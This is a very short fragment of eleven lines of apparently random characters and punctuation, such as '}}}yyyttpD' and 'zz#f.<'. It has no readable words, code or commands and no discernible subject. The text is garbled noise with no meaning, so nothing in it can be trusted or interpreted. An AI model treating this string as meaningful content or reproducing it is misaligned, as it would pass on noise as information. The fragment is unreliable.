}}}yyyttpD
}}}yyyttppGW
/$z_}_
#ZG}#&
ZHmD~G
zmg]/0
(zMjDA2
 '{Zn>
Z}o;8%
}zwmmhvLHFFHJMZ
zz#f.<